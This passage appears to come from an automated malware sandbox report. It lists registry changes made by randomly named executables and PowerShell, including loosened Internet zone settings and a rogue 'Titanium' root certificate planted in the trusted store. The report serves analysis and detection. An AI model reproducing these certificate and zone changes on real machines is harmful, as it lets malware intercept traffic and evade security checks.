Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\COQZRGP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\MsiExec.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc309361a0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zS238C.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{181DFB55-394D-44D3-9EDB-AF2C4472C40A}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{48C7F4C0-C9D6-4742-957C-A6FD52E8C4AE}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{67C50AFE-3E78-11E9-B25E-7768F80C0E07}\NumMethods\ = "26" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6E253EE8-477A-2497-6759-88B8292A5AF0}\ = "IEmulatedUSB" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7191CF38-3E8A-11E9-825C-AB7B2CABCE23}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{327E3C00-EE61-462F-AED3-0DFF6CBF9904} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DFA7E4F5-B4A4-44CE-85A8-127AC5EB59DC}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8E3496E-735F-4FDE-8A54-427D49409B5F}\ = "ICloudNetwork" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5094F67A-8084-11E9-B185-DBE296E54799}\NumMethods\ = "9" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{67C50AFE-3E78-11E9-B25E-7768F80C0E07}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{01510F40-C196-4D26-B8DB-4C8C389F1F82}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{10CD08D0-E8B8-4838-B10C-45BA193734C1}\NumMethods\ = "25" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\NumMethods\ = "36" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CAC21692-7997-4595-A731-3A509DB604E5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{08889892-1EC6-4883-801D-77F56CFD0103}\NumMethods\ = "13" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{6DC83C2C-81A9-4005-9D52-FC45A78BF3F5}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F2F7FAE4-4A06-81FC-A916-78B2DA1FA0E5}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{FB220201-2FD3-47E2-A5DC-2C2431D833CC}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8E3496E-735F-4FDE-8A54-427D49409B5F}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{DDCA7247-BF98-47FB-AB2F-B5177533F493}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6FA2671B-0547-448E-BC7C-94E9E173BF57}\ = "IHostUpdate" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2FD82A4B0C2D65943AA4D477AB9223CC\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{00391758-00B1-4E9D-0000-11FA00F9D583}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50CE4B51-0FF7-46B7-A138-3C6E5AC946B4}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C365FB7B-4430-499F-92C8-8BED814A567A} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\NumMethods\ = "15" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{269D8F6B-FA1E-4CEE-91C7-6D8496BEA3C1}\NumMethods\ = "14" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F692806F-FEBE-4049-B476-1292A8E45B09}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{A443DA5B-AA82-4720-BC84-BD097B2B13B8}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B5DDB370-08A7-4C8F-910D-47AABD67253A}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{B79DE686-EABD-4FA6-960A-F1756C99EA1C} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{A0BAD6DF-D612-47D3-89D4-DB3992533948}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{31587F93-2D12-4D7C-BA6D-CE51D0D5B265}\ = "IBandwidthGroup" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{DFE56449-6989-4002-80CF-3607F377D40C}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00F4A8DC-0002-4B81-0077-1DCB004571BA}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{46735DE7-F4C4-4020-A185-0D2881BCFA8B}\ = "IDHCPGlobalConfig" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EA9227C-E9BB-49B3-BFC7-C5171E93EF38}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{431685DA-3618-4EBC-B038-833BA829B4B2}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4680B2DE-8690-11E9-B83D-5719E53CF1DE}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2FD82A4B0C2D65943AA4D477AB9223CC\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\AppID = "{819B4D85-9CEE-493C-B6FC-64FFE759B3C9}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E9A0C183-7071-4894-93D6-DCBEC010FA91}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\VirtualBox.VirtualBoxClient\CurVer C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{78861431-D545-44AA-8013-181B8C288554} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A0BAD6DF-D612-47D3-89D4-DB3992533948}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{B55CF856-1F8B-4692-ABB4-462429FAE5E9} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vmdk\Content Type = "application/x-virtualbox-vmdk" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B6E1AEE-35F3-4F4D-B5BB-ED0ECEFD8538}\ = "IEventSource" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{9EA9227C-E9BB-49B3-BFC7-C5171E93EF38} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D5ABC823-04D0-4DB6-8D66-DC2F033120E1}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9DB3A9E6-7F29-4AAE-A627-5A282C83092C}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\progId_VirtualBox.Shell.ova\ = "Open Virtualization Format Archive" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{21637B0E-34B8-42D3-ACFB-7E96DAF77C22} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D78374E9-486E-472F-481B-969746AF2480}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{39B4E759-1EC0-4C0F-857F-FBE2A737A256}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{70E7779A-E64A-4908-804E-371CAD23A756} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{755E6BDF-1640-41F9-BD74-3EF5FD653250}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{93BADC0C-61D9-4940-A084-E6BB29AF3D83}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ADF292B0-92C9-4A77-9D35-E058B39FE0B9}\ = "ICanShowWindowEvent" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\TypeLib C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c